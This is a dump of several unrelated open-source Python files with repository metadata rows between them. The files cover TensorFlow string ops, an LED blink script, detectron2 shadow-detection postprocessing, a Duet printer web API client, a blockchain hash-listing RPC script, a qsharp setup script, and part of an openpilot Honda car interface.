ops.NotDifferentiable("ReduceJoin")
ops.NotDifferentiable("StringJoin")
ops.NotDifferentiable("StringSplit")
ops.NotDifferentiable("AsString")
ops.NotDifferentiable("EncodeBase64")
ops.NotDifferentiable("DecodeBase64")
@tf_export("strings.to_number", v1=[])
@dispatch.add_dispatch_support
def string_to_number(input, out_type=dtypes.float32, name=None):
r"""Converts each string in the input Tensor to the specified numeric type.
(Note that int32 overflow results in an error while float overflow
results in a rounded value.)
Examples:
>>> tf.strings.to_number("1.55")
<tf.Tensor: shape=(), dtype=float32, numpy=1.55>
>>> tf.strings.to_number("3", tf.int32)
<tf.Tensor: shape=(), dtype=int32, numpy=3>
Args:
input: A `Tensor` of type `string`.
out_type: An optional `tf.DType` from: `tf.float32, tf.float64, tf.int32,
tf.int64`. Defaults to `tf.float32`.
The numeric type to interpret each string in `string_tensor` as.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `out_type`.
"""
return gen_parsing_ops.string_to_number(input, out_type, name)
@tf_export(v1=["strings.to_number", "string_to_number"])
def string_to_number_v1(
string_tensor=None,
out_type=dtypes.float32,
name=None,
input=None):
string_tensor = deprecation.deprecated_argument_lookup(
"input", input, "string_tensor", string_tensor)
return gen_parsing_ops.string_to_number(string_tensor, out_type, name)
string_to_number_v1.__doc__ = gen_parsing_ops.string_to_number.__doc__
@tf_export("strings.to_hash_bucket", v1=[])
@dispatch.add_dispatch_support
def string_to_hash_bucket(input, num_buckets, name=None):
# pylint: disable=line-too-long
r"""Converts each string in the input Tensor to its hash mod by a number of buckets.
The hash function is deterministic on the content of the string within the
process.
Note that the hash function may change from time to time.
This functionality will be deprecated and it's recommended to use
`tf.strings.to_hash_bucket_fast()` or `tf.strings.to_hash_bucket_strong()`.
Examples:
>>> tf.strings.to_hash_bucket(["Hello", "TensorFlow", "2.x"], 3)
<tf.Tensor: shape=(3,), dtype=int64, numpy=array([2, 0, 1])>
Args:
input: A `Tensor` of type `string`.
num_buckets: An `int` that is `>= 1`. The number of buckets.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `int64`.
"""
# pylint: enable=line-too-long
return gen_string_ops.string_to_hash_bucket(input, num_buckets, name)
@tf_export(v1=["strings.to_hash_bucket", "string_to_hash_bucket"])
def string_to_hash_bucket_v1(
string_tensor=None,
num_buckets=None,
name=None,
input=None):
string_tensor = deprecation.deprecated_argument_lookup(
"input", input, "string_tensor", string_tensor)
return gen_string_ops.string_to_hash_bucket(string_tensor, num_buckets, name)
string_to_hash_bucket_v1.__doc__ = gen_string_ops.string_to_hash_bucket.__doc__
@tf_export("strings.join", v1=["strings.join", "string_join"])
@deprecation.deprecated_endpoints("string_join")
@dispatch.add_dispatch_support
def string_join(inputs, separator="", name=None):
"""Perform element-wise concatenation of a list of string tensors.
Given a list of string tensors of same shape, performs element-wise
concatenation of the strings of the same index in all tensors.
>>> tf.strings.join(['abc','def']).numpy()
b'abcdef'
>>> tf.strings.join([['abc','123'],
... ['def','456'],
... ['ghi','789']]).numpy()
array([b'abcdefghi', b'123456789'], dtype=object)
>>> tf.strings.join([['abc','123'],
... ['def','456']],
... separator=" ").numpy()
array([b'abc def', b'123 456'], dtype=object)
Args:
inputs: A list of `tf.Tensor` objects of same size and `tf.string` dtype.
separator: A string added between each string being joined.
name: A name for the operation (optional).
Returns:
A `tf.string` tensor.
"""
return gen_string_ops.string_join(inputs, separator=separator, name=name)
| 37.432247 | 100 | 0.680704 |
54ae8c29dc0b79ef643b52c18e7c2540f8426a26 | 147 | py | Python | test.py | cfreeman/hota-alinta | 70f07a853800bf051e17a51e099b9d8069a35561 | [
"Unlicense"
] | null | null | null | test.py | cfreeman/hota-alinta | 70f07a853800bf051e17a51e099b9d8069a35561 | [
"Unlicense"
] | null | null | null | test.py | cfreeman/hota-alinta | 70f07a853800bf051e17a51e099b9d8069a35561 | [
"Unlicense"
] | null | null | null | from gpiozero import LED
from time import sleep
led = LED(14)
while True:
led.on()
sleep(0.1)
led.off()
sleep(1)
| 13.363636 | 24 | 0.55102 |
a07c2964d8db6638677a8cff4f67c2d16ebc116d | 10,886 | py | Python | detectron2/modeling/postprocessing.py | sksmslhy/InstanceShadowDetection | 44f9910fb3e14bb03e0a30576021943bff8e4120 | [
"Apache-2.0"
] | 100 | 2020-06-10T08:34:20.000Z | 2022-03-28T17:08:46.000Z | detectron2/modeling/postprocessing.py | temperrain/InstanceShadowDetection | 1bcf911ba5dfdefbd22397409cd56e169040abe5 | [
"Apache-2.0"
] | 17 | 2020-06-12T13:13:42.000Z | 2022-03-12T00:34:37.000Z | detectron2/modeling/postprocessing.py | temperrain/InstanceShadowDetection | 1bcf911ba5dfdefbd22397409cd56e169040abe5 | [
"Apache-2.0"
] | 18 | 2020-06-20T04:05:53.000Z | 2022-03-01T06:58:47.000Z | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from torch.nn import functional as F
import math
import numpy as np
from detectron2.layers import paste_masks_in_image
from detectron2.structures import Boxes, BoxMode, Instances
import pysobatools.sobaeval as eval
def decode(segm):
return eval.maskUtils.decode(segm).astype('uint8')
def encode(segm):
return eval.maskUtils.encode(segm)
def detector_postprocess(results, output_height, output_width, mask_threshold=0.5):
"""
Resize the output instances.
The input images are often resized when entering an object detector.
As a result, we often need the outputs of the detector in a different
resolution from its inputs.
This function will resize the raw outputs of an R-CNN detector
to produce outputs according to the desired output resolution.
Args:
results (Instances): the raw outputs from the detector.
`results.image_size` contains the input image resolution the detector sees.
This object might be modified in-place.
output_height, output_width: the desired output resolution.
Returns:
Instances: the resized output from the model, based on the output resolution
"""
scale_x, scale_y = (output_width / results.image_size[1], output_height / results.image_size[0])
results = Instances((output_height, output_width), **results.get_fields())
if results.has("pred_boxes"):
output_boxes = results.pred_boxes
elif results.has("proposal_boxes"):
output_boxes = results.proposal_boxes
output_boxes.tensor[:, 0::2] *= scale_x
output_boxes.tensor[:, 1::2] *= scale_y
output_boxes.clip(results.image_size)
results = results[output_boxes.nonempty()]
if results.has("pred_masks"):
results.pred_masks = paste_masks_in_image(
results.pred_masks[:, 0, :, :], # N, 1, M, M
results.pred_boxes,
results.image_size,
threshold=mask_threshold,
)
if results.has("pred_keypoints"):
results.pred_keypoints[:, :, 0] *= scale_x
results.pred_keypoints[:, :, 1] *= scale_y
return results
def sem_seg_postprocess(result, img_size, output_height, output_width):
"""
Return semantic segmentation predictions in the original resolution.
The input images are often resized when entering semantic segmentor. Moreover, in same
cases, they also padded inside segmentor to be divisible by maximum network stride.
As a result, we often need the predictions of the segmentor in a different
resolution from its inputs.
Args:
result (Tensor): semantic segmentation prediction logits. A tensor of shape (C, H, W),
where C is the number of classes, and H, W are the height and width of the prediction.
img_size (tuple): image size that segmentor is taking as input.
output_height, output_width: the desired output resolution.
Returns:
semantic segmentation prediction (Tensor): A tensor of the shape
(C, output_height, output_width) that contains per-pixel soft predictions.
"""
result = result[:, : img_size[0], : img_size[1]].expand(1, -1, -1, -1)
result = F.interpolate(
result, size=(output_height, output_width), mode="bilinear", align_corners=False
)[0]
return result
def takeTwo(elm):
return elm[1]
#
# """
# param:
# rec1: (x0, y0, w, h)
# rec2: (x0, y0, w, h)
# x0, y0: the upper left point of rec.
# w, h: the length and width of rec.
# """
def compute_iou(rec1, rec2):
left_x = max(rec1[0], rec2[0])
left_y = max(rec1[1], rec2[1])
right_x = min(rec1[0] + rec1[2], rec2[0] + rec2[2])
right_y = min(rec1[1] + rec1[3], rec2[1] + rec2[3])
if left_x >= right_x or left_y >= right_y:
return 0
else:
S_mid = (right_y - left_y) * (right_x - left_x)
S_total = (rec1[2] * rec1[3]) + (rec2[2] * rec2[3]) - S_mid
return S_mid / S_total
def box_combine(o, s, box1, box2):
"""
args:
box1 : (x1_0, y1_0, x1_1, y1_1)
box2: (x2_0, y2_0, x2_1, y2_1)
return:
dict["1_2":(min(x1_0,x2_0),min(y1_0,y2_0),max(x1_1,x2-1),max(y2_1,y2_2))]
"""
name = '{}_{}'.format(o, s)
combine = (min(box1[0], box2[0]), min(box1[1], box2[1]),
max(box1[2], box2[2]), max(box1[3], box2[3]))
combine = (combine[0], combine[1], combine[2] - combine[0],
combine[3] - combine[1]) # XYXY to XYWH
return [name, combine]
def compute_direction(box1,box2):
pass
def rect_distance(a, b):
x1, y1, x1b, y1b = a
x2, y2, x2b, y2b = b
left = x2b < x1
right = x1b < x2
bottom = y2b < y1
top = y1b < y2
if top and left:
return dist((x1, y1b), (x2b, y2))
elif left and bottom:
return dist((x1, y1), (x2b, y2b))
elif bottom and right:
return dist((x1b, y1), (x2, y2b))
elif right and top:
return dist((x1b, y1b), (x2, y2))
elif left:
return x1 - x2b
elif right:
return x2 - x1b
elif bottom:
return y1 - y2b
elif top:
return y2 - y1b
else:
return 0
def dist(a, b):
return math.sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2)
def matchor(instance, association):
results = []
objects = [i for i, v in enumerate(instance.pred_classes) if v == 0]
shadows = [i for i, v in enumerate(instance.pred_classes) if v == 1]
boxes = []
for o in objects:
if instance.scores[o] < 0.5:
continue
for s in shadows:
if instance.scores[s] < 0.5:
continue
o_box = instance.pred_boxes[o].tensor[0].numpy()
s_box = instance.pred_boxes[s].tensor[0].numpy()
o_area = (o_box[2] - o_box[0]) * (o_box[3] - o_box[1])
s_area = (s_box[2] - s_box[0]) * (s_box[3] - s_box[1])
if compute_iou((o_box[0], o_box[1], o_box[2] - o_box[0], o_box[3] - o_box[1]), (s_box[0], s_box[1], s_box[2] - s_box[0], s_box[3] - s_box[1])) == 0:
if rect_distance(o_box, s_box) >= s_box[3] - s_box[1]:
continue
boxes.append(box_combine(o, s, o_box, s_box))
ass_boxes = association.pred_boxes.tensor.numpy()
pair = []
for i, ass_box in enumerate(ass_boxes):
scores = []
ass_box = [ass_box[0], ass_box[1], ass_box[2] - ass_box[0], ass_box[3] - ass_box[1]]
for box in boxes:
k, v = box
scores.append([str(i) + '_' + k, compute_iou(ass_box, v)])
if len(ass_boxes) == 1:
pair.append(sorted(scores, key=takeTwo, reverse=True)[:1])
else:
pair.append(sorted(scores, key=takeTwo, reverse=True)[:1])
if not sum([sc[1] > 0.5 for sc in pair[i]]):
pair[i] = [[0, 0]]
O = {}
S = {}
for k, v in enumerate(pair):
if v != [[0, 0]] and v != []:
r, o, s = v[0][0].split('_')
if o in O:
if s in S:
if v[0][1] > O[o][1] and v[0][1] > S[s][1]:
O[o] = v[0]
S[s] = v[0]
else:
if v[0][1] > O[o][1]:
O[o] = v[0]
elif s in S:
if v[0][1] > S[s][1]:
S[s] = v[0]
else:
O[o] = v[0]
S[s] = v[0]
for k, v in S.items():
r, o, s = v[0].split('_')
results.append((int(o), int(s), int(r)))
ins_association = instance.pred_classes * 0
ret_association = association.pred_classes * 0
if results == []:
instance.pred_associations = ins_association
association.pred_associations = ret_association
return instance, association
association_id = 1
for i in results:
if ins_association[i[0]]+ins_association[i[1]] == 0:
ins_association[i[0]] = association_id
ins_association[i[1]] = association_id
ret_association[i[2]] = association_id
association_id += 1
instance.pred_associations = ins_association
association.pred_associations = ret_association
return instance, association
def combine_association(instance, association):
pred_masks = [mask.numpy() for mask in instance.pred_masks]
pred_scores = instance.scores.numpy()
pred_boxes = instance.pred_boxes.tensor.numpy().tolist()
pred_classes = instance.pred_classes.numpy()
h, w = pred_masks[0].shape
pred_associations = instance.pred_associations.numpy()
pred_light = association.pred_light.tensor.numpy()
ret = Instances((h,w))
ins = Instances((h,w))
if np.sum(pred_associations) == 0:
ret.pred_boxes = association.pred_boxes
ret.scores = association.scores
ret.pred_classes = association.pred_classes
ret.pred_light = association.pred_light.tensor.numpy().tolist()
segm = np.zeros((h,w,1),order='F',dtype='uint8')
ret.pred_masks = [segm] * len(association.pred_boxes)
ret.pred_associations = association.pred_associations.numpy().astype('int').tolist()
instance.pred_associations = pred_associations.astype('int').tolist()
return ret,instance
mask_map = {}
for i, ass in enumerate(pred_associations):
if ass != 0:
if ass in mask_map:
if pred_classes[i] == 1:
mask_map[ass].append((pred_masks[i], pred_scores[i],pred_classes[i],pred_boxes[i]))
else:
mask_map[ass] = [(pred_masks[i], pred_scores[i],pred_classes[i],pred_boxes[i]),mask_map[ass][0]]
else:
mask_map[ass] = [(pred_masks[i], pred_scores[i],pred_classes[i],pred_boxes[i])]
results = []
boxes = []
scores = []
classes = []
associations = []
light = []
for i,ass in enumerate(association.pred_associations):
if ass != 0:
light.append(pred_light[i].tolist())
for k, v in mask_map.items():
associations.append(int(k))
s, o = v
avg_score = float((s[1]+ o[1])/2)
_s = s[0].reshape(h,w,1)
_o = o[0].reshape(h,w,1)
comb = _s + _o
classes.append(0)
segm = encode(np.array(comb,order='F',dtype='uint8'))[0]
boxes.append(BoxMode.convert(eval.maskUtils.toBbox(segm), BoxMode.XYWH_ABS, BoxMode.XYXY_ABS))
results.append(comb)
scores.append(avg_score)
ret.pred_masks = results
ret.pred_boxes = boxes
ret.scores = scores
ret.pred_classes = classes
ret.pred_associations = associations
ret.pred_light= light
instance.pred_associations = instance.pred_associations.numpy().astype('int').tolist()
return ret,instance
| 34.55873 | 160 | 0.593331 |
1fc57994749a3a64e86cace471d7de063b4cdaca | 4,180 | py | Python | duetwebapi/api/dwc_api.py | AndyEveritt/DuetWebAPI | 7b4826b24716b7de6bd87f7ab1fcd1f8f4b3c3cd | [
"MIT"
] | 8 | 2021-01-28T16:29:12.000Z | 2022-03-27T04:15:01.000Z | duetwebapi/api/dwc_api.py | AndyEveritt/DuetWebAPI | 7b4826b24716b7de6bd87f7ab1fcd1f8f4b3c3cd | [
"MIT"
] | 1 | 2021-04-14T14:54:08.000Z | 2021-04-21T15:54:41.000Z | duetwebapi/api/dwc_api.py | AndyEveritt/DuetWebAPI | 7b4826b24716b7de6bd87f7ab1fcd1f8f4b3c3cd | [
"MIT"
] | 1 | 2021-02-05T03:40:50.000Z | 2021-02-05T03:40:50.000Z | import logging
import os
from typing import Dict, List, Union
from io import StringIO, TextIOWrapper, BytesIO
import requests
from .base import DuetAPI
class DWCAPI(DuetAPI):
"""
Duet Web Control REST API Interface.
Used with a Duet 2/3 in standalone mode.
Must use RRF3.
"""
api_name = 'DWC_REST'
def connect(self, password=''):
""" Start connection to Duet """
url = f'{self.base_url}/rr_connect'
r = requests.get(url, {'password': password})
if not r.ok:
raise ValueError
return r.json()
def disconnect(self):
""" End connection to Duet """
url = f'{self.base_url}/rr_disconnect'
r = requests.get(url)
if not r.ok:
raise ValueError
return r.json()
def get_model(self, key: str = None, depth: int = 99, verbose: bool = True, null: bool = True, frequent: bool = False, obsolete: bool = False) -> Dict:
url = f'{self.base_url}/rr_model'
flags = f'd{depth}'
flags += 'v' if verbose is True else ''
flags += 'n' if null is True else ''
flags += 'f' if frequent is True else ''
flags += 'o' if obsolete is True else ''
r = requests.get(url, {'flags': flags, 'key': key})
if not r.ok:
raise ValueError
j = r.json()
return j['result']
def _get_reply(self) -> Dict:
url = f'{self.base_url}/rr_reply'
r = requests.get(url)
if not r.ok:
raise ValueError
return r.text
def send_code(self, code: str) -> Dict:
url = f'{self.base_url}/rr_gcode'
r = requests.get(url, {'gcode': code})
if not r.ok:
raise ValueError
reply = self._get_reply()
return {'response': reply}
def get_file(self, filename: str, directory: str = 'gcodes', binary: bool = False) -> str:
"""
filename: name of the file you want to download including extension
directory: the folder that the file is in, options are ['gcodes', 'macros', 'sys']
binary: return binary data instead of a string
returns the file as a string or binary data
"""
url = f'{self.base_url}/rr_download'
r = requests.get(url, {'name': f'/{directory}/{filename}'})
if not r.ok:
raise ValueError
if binary:
return r.content
else:
return r.text
def upload_file(self, file: Union[str, bytes, StringIO, TextIOWrapper, BytesIO], filename: str, directory: str = 'gcodes') -> Dict:
url = f'{self.base_url}/rr_upload?name=/{directory}/{filename}'
r = requests.post(url, data=file)
if not r.ok:
raise ValueError
return r.json()
def get_fileinfo(self, filename: str = None, directory: str = 'gcodes') -> Dict:
url = f'{self.base_url}/rr_fileinfo'
if filename:
r = requests.get(url, {'name': f'/{directory}/{filename}'})
else:
r = requests.get(url)
if not r.ok:
raise ValueError
return r.json()
def delete_file(self, filename: str, directory: str = 'gcodes') -> Dict:
url = f'{self.base_url}/rr_delete'
r = requests.get(url, {'name': f'/{directory}/{filename}'})
if not r.ok:
raise ValueError
return r.json()
def move_file(self, from_path, to_path, **_ignored):
# BUG this doesn't work currently
raise NotImplementedError
url = f'{self.base_url}/rr_move'
r = requests.get(url, {'old': f'{from_path}', 'new': f'{to_path}'})
if not r.ok:
raise ValueError
return r.json()
def get_directory(self, directory: str) -> List[Dict]:
url = f'{self.base_url}/rr_filelist'
r = requests.get(url, {'dir': f'/{directory}'})
if not r.ok:
raise ValueError
return r.json()['files']
def create_directory(self, directory: str) -> Dict:
url = f'{self.base_url}/rr_mkdir'
r = requests.get(url, {'dir': f'/{directory}'})
if not r.ok:
raise ValueError
return r.json()
| 32.913386 | 155 | 0.566029 |
73bb7606df83d72c9922408e611480a60d2e0717 | 3,036 | py | Python | contrib/linearize/linearize-hashes.py | RottenCoin/agouti | 745e1c8bffe286a517dff6d5ba69e39630e772e3 | [
"MIT"
] | 6 | 2018-10-31T10:43:13.000Z | 2021-05-02T15:41:26.000Z | contrib/linearize/linearize-hashes.py | RottenCoin/agouti | 745e1c8bffe286a517dff6d5ba69e39630e772e3 | [
"MIT"
] | null | null | null | contrib/linearize/linearize-hashes.py | RottenCoin/agouti | 745e1c8bffe286a517dff6d5ba69e39630e772e3 | [
"MIT"
] | 4 | 2018-09-18T15:42:38.000Z | 2019-10-27T19:02:53.000Z | #!/usr/bin/python
#
# linearize-hashes.py: List blocks in a linear, no-fork version of the chain.
#
# Copyright (c) 2013-2014 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from __future__ import print_function
import json
import struct
import re
import base64
import httplib
import sys
settings = {}
class BitcoinRPC:
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def execute(self, obj):
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print("JSON-RPC: no response", file=sys.stderr)
return None
body = resp.read()
resp_obj = json.loads(body)
return resp_obj
@staticmethod
def build_request(idx, method, params):
obj = { 'version' : '1.1',
'method' : method,
'id' : idx }
if params is None:
obj['params'] = []
else:
obj['params'] = params
return obj
@staticmethod
def response_is_error(resp_obj):
return 'error' in resp_obj and resp_obj['error'] is not None
def get_block_hashes(settings, max_blocks_per_call=10000):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpassword'])
height = settings['min_height']
while height < settings['max_height']+1:
num_blocks = min(settings['max_height']+1-height, max_blocks_per_call)
batch = []
for x in range(num_blocks):
batch.append(rpc.build_request(x, 'getblockhash', [height + x]))
reply = rpc.execute(batch)
for x,resp_obj in enumerate(reply):
if rpc.response_is_error(resp_obj):
print('JSON-RPC: error at height', height+x, ': ', resp_obj['error'], file=sys.stderr)
exit(1)
assert(resp_obj['id'] == x) # assume replies are in-sequence
print(resp_obj['result'])
height += num_blocks
if __name__ == '__main__':
if len(sys.argv) != 2:
print("Usage: linearize-hashes.py CONFIG-FILE")
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 6161
if 'min_height' not in settings:
settings['min_height'] = 0
if 'max_height' not in settings:
settings['max_height'] = 313000
if 'rpcuser' not in settings or 'rpcpassword' not in settings:
print("Missing username and/or password in cfg file", file=stderr)
sys.exit(1)
settings['port'] = int(settings['port'])
settings['min_height'] = int(settings['min_height'])
settings['max_height'] = int(settings['max_height'])
get_block_hashes(settings)
| 26.631579 | 90 | 0.682477 |
680389e6a402a9694bd5e5c9ad07f1d8a0b920ba | 2,026 | py | Python | src/Python/qsharp-core/setup.py | jond01/iqsharp | 4324d1d6de03102edf5fd210b6f22655ee9b6fa2 | [
"MIT"
] | 115 | 2019-07-11T16:41:24.000Z | 2022-02-06T13:30:32.000Z | src/Python/qsharp-core/setup.py | jond01/iqsharp | 4324d1d6de03102edf5fd210b6f22655ee9b6fa2 | [
"MIT"
] | 346 | 2019-07-11T17:26:31.000Z | 2022-03-30T06:52:51.000Z | src/Python/qsharp-core/setup.py | jond01/iqsharp | 4324d1d6de03102edf5fd210b6f22655ee9b6fa2 | [
"MIT"
] | 50 | 2019-07-23T16:03:02.000Z | 2022-03-29T21:01:14.000Z | #!/bin/env python
# -*- coding: utf-8 -*-
##
# setup.py: Installs Python host functionality for Q#.
##
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
##
## IMPORTS ##
import setuptools
import os
## VERSION INFORMATION ##
# Our build process sets the PYTHON_VERSION environment variable to a version
# string that is compatible with PEP 440, and so we inherit that version number
# here and propagate that to qsharp/version.py.
#
# To make sure that local builds still work without the same environment
# variables, we'll default to 0.0.0.1 as a development version.
version = os.environ.get('PYTHON_VERSION', '0.0.0.1')
with open('./qsharp/version.py', 'w') as f:
f.write(f'''# Auto-generated file, do not edit.
##
# version.py: Specifies the version of the qsharp package.
##
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
##
__version__ = "{version}"
is_conda = False
_user_agent_extra = "[{version}]"
''')
## DESCRIPTION ##
# The long description metadata passed to setuptools is used to populate the
# PyPI page for this package. Thus, we'll generate the description by using the
# same README.md file that we use in the GitHub repo.
with open("./README.md", "r") as fh:
long_description = fh.read()
## SETUPTOOLS INVOCATION ##
setuptools.setup(
name="qsharp-core",
version=version,
author="Microsoft",
author_email="que-contacts@microsoft.com",
description="Python client for Q#, a domain-specific quantum programming language",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/microsoft/iqsharp",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=[
'jupyter_client',
'pyzmq<20.0.0' # due to incompatibility of IQ# with pyzmq>=20.0.0
]
)
| 29.794118 | 87 | 0.699408 |
03074b875c107a69650d8885bf8e3b0d83c216f9 | 20,505 | py | Python | selfdrive/car/honda/interface.py | shoes22/openpilot | a965de3c96a53b67d106cfa775e3407db82dd0e1 | [
"MIT"
] | 53 | 2018-07-31T04:26:48.000Z | 2022-03-29T08:50:06.000Z | selfdrive/car/honda/interface.py | shoes22/openpilot | a965de3c96a53b67d106cfa775e3407db82dd0e1 | [
"MIT"
] | 47 | 2018-07-21T15:31:51.000Z | 2022-03-25T10:21:24.000Z | selfdrive/car/honda/interface.py | shoes22/openpilot | a965de3c96a53b67d106cfa775e3407db82dd0e1 | [
"MIT"
] | 124 | 2018-09-05T18:32:30.000Z | 2022-03-13T16:30:50.000Z | #!/usr/bin/env python3
from cereal import car
from panda import Panda
from common.numpy_fast import interp
from common.params import Params
from selfdrive.car.honda.values import CarControllerParams, CruiseButtons, HondaFlags, CAR, HONDA_BOSCH, HONDA_NIDEC_ALT_SCM_MESSAGES, HONDA_BOSCH_ALT_BRAKE_SIGNAL
from selfdrive.car import STD_CARGO_KG, CivicParams, scale_rot_inertia, scale_tire_stiffness, gen_empty_fingerprint, get_safety_config
from selfdrive.car.interfaces import CarInterfaceBase
from selfdrive.car.disable_ecu import disable_ecu
from selfdrive.config import Conversions as CV
ButtonType = car.CarState.ButtonEvent.Type
EventName = car.CarEvent.EventName
TransmissionType = car.CarParams.TransmissionType
class CarInterface(CarInterfaceBase):
@staticmethod
def get_pid_accel_limits(CP, current_speed, cruise_speed):
if CP.carFingerprint in HONDA_BOSCH:
return CarControllerParams.BOSCH_ACCEL_MIN, CarControllerParams.BOSCH_ACCEL_MAX
else:
# NIDECs don't allow acceleration near cruise_speed,
# so limit limits of pid to prevent windup
ACCEL_MAX_VALS = [CarControllerParams.NIDEC_ACCEL_MAX, 0.2]
ACCEL_MAX_BP = [cruise_speed - 2., cruise_speed - .2]
return CarControllerParams.NIDEC_ACCEL_MIN, interp(current_speed, ACCEL_MAX_BP, ACCEL_MAX_VALS)
@staticmethod
def get_params(candidate, fingerprint=gen_empty_fingerprint(), car_fw=[]): # pylint: disable=dangerous-default-value
ret = CarInterfaceBase.get_std_params(candidate, fingerprint)
ret.carName = "honda"
if candidate in HONDA_BOSCH:
ret.safetyConfigs = [get_safety_config(car.CarParams.SafetyModel.hondaBosch)]
ret.radarOffCan = True
# Disable the radar and let openpilot control longitudinal
# WARNING: THIS DISABLES AEB!
ret.openpilotLongitudinalControl = Params().get_bool("DisableRadar")
ret.pcmCruise = not ret.openpilotLongitudinalControl
else:
ret.safetyConfigs = [get_safety_config(car.CarParams.SafetyModel.hondaNidec)]
ret.enableGasInterceptor = 0x201 in fingerprint[0]
ret.openpilotLongitudinalControl = True
ret.pcmCruise = not ret.enableGasInterceptor
ret.communityFeature = ret.enableGasInterceptor
if candidate == CAR.CRV_5G:
ret.enableBsm = 0x12f8bfa7 in fingerprint[0]
# Detect Bosch cars with new HUD msgs
if any(0x33DA in f for f in fingerprint.values()):
ret.flags |= HondaFlags.BOSCH_EXT_HUD.value
# Accord 1.5T CVT has different gearbox message
if candidate == CAR.ACCORD and 0x191 in fingerprint[1]:
ret.transmissionType = TransmissionType.cvt
# Certain Hondas have an extra steering sensor at the bottom of the steering rack,
# which improves controls quality as it removes the steering column torsion from feedback.
# Tire stiffness factor fictitiously lower if it includes the steering column torsion effect.
# For modeling details, see p.198-200 in "The Science of Vehicle Dynamics (2014), M. Guiggiani"
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0], [0]]
ret.lateralTuning.pid.kiBP, ret.lateralTuning.pid.kpBP = [[0.], [0.]]
ret.lateralTuning.pid.kf = 0.00006 # conservative feed-forward
if candidate in HONDA_BOSCH:
ret.longitudinalTuning.kpV = [0.25]
ret.longitudinalTuning.kiV = [0.05]
ret.longitudinalActuatorDelayUpperBound = 0.5 # s
else:
# default longitudinal tuning for all hondas
ret.longitudinalTuning.kpBP = [0., 5., 35.]
ret.longitudinalTuning.kpV = [1.2, 0.8, 0.5]
ret.longitudinalTuning.kiBP = [0., 35.]
ret.longitudinalTuning.kiV = [0.18, 0.12]
eps_modified = False
for fw in car_fw:
if fw.ecu == "eps" and b"," in fw.fwVersion:
eps_modified = True
if candidate == CAR.CIVIC:
stop_and_go = True
ret.mass = CivicParams.MASS
ret.wheelbase = CivicParams.WHEELBASE
ret.centerToFront = CivicParams.CENTER_TO_FRONT
ret.steerRatio = 15.38 # 10.93 is end-to-end spec
if eps_modified:
# stock request input values: 0x0000, 0x00DE, 0x014D, 0x01EF, 0x0290, 0x0377, 0x0454, 0x0610, 0x06EE
# stock request output values: 0x0000, 0x0917, 0x0DC5, 0x1017, 0x119F, 0x140B, 0x1680, 0x1680, 0x1680
# modified request output values: 0x0000, 0x0917, 0x0DC5, 0x1017, 0x119F, 0x140B, 0x1680, 0x2880, 0x3180
# stock filter output values: 0x009F, 0x0108, 0x0108, 0x0108, 0x0108, 0x0108, 0x0108, 0x0108, 0x0108
# modified filter output values: 0x009F, 0x0108, 0x0108, 0x0108, 0x0108, 0x0108, 0x0108, 0x0400, 0x0480
# note: max request allowed is 4096, but request is capped at 3840 in firmware, so modifications result in 2x max
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 2560, 8000], [0, 2560, 3840]]
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.3], [0.1]]
else:
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 2560], [0, 2560]]
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[1.1], [0.33]]
tire_stiffness_factor = 1.
elif candidate in (CAR.CIVIC_BOSCH, CAR.CIVIC_BOSCH_DIESEL):
stop_and_go = True
ret.mass = CivicParams.MASS
ret.wheelbase = CivicParams.WHEELBASE
ret.centerToFront = CivicParams.CENTER_TO_FRONT
ret.steerRatio = 15.38 # 10.93 is end-to-end spec
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 1.
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.8], [0.24]]
elif candidate in (CAR.ACCORD, CAR.ACCORDH):
stop_and_go = True
ret.mass = 3279. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.83
ret.centerToFront = ret.wheelbase * 0.39
ret.steerRatio = 16.33 # 11.82 is spec end-to-end
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.8467
if eps_modified:
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.3], [0.09]]
else:
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.18]]
elif candidate == CAR.ACURA_ILX:
stop_and_go = False
ret.mass = 3095. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.67
ret.centerToFront = ret.wheelbase * 0.37
ret.steerRatio = 18.61 # 15.3 is spec end-to-end
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 3840], [0, 3840]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.72
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.8], [0.24]]
